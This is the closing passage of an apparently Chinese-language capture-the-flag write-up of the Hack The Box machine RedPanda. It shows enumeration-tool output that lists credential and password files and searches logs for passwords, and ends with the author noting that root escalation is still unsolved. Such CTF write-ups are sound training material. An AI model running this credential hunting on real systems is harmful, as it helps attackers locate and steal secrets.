/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/cloud/instances/f97e41c8-944d-4b3f-a3a8-8db23afb94f3/sem/config_set_passwords
/var/lib/fwupd/pki/secret.key
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal matches
[ 3.636139] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[ 3.808595] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
-
目前还没找到正确的提权方法,这次就当作一次SSTI注入来发吧,等找到方法了再更新文章
-
有兴趣的UU可以上 Hack The Box: Hacking Training For The Best | Individuals & Companies 尝试提权到root,本次的机器名为:RedPanda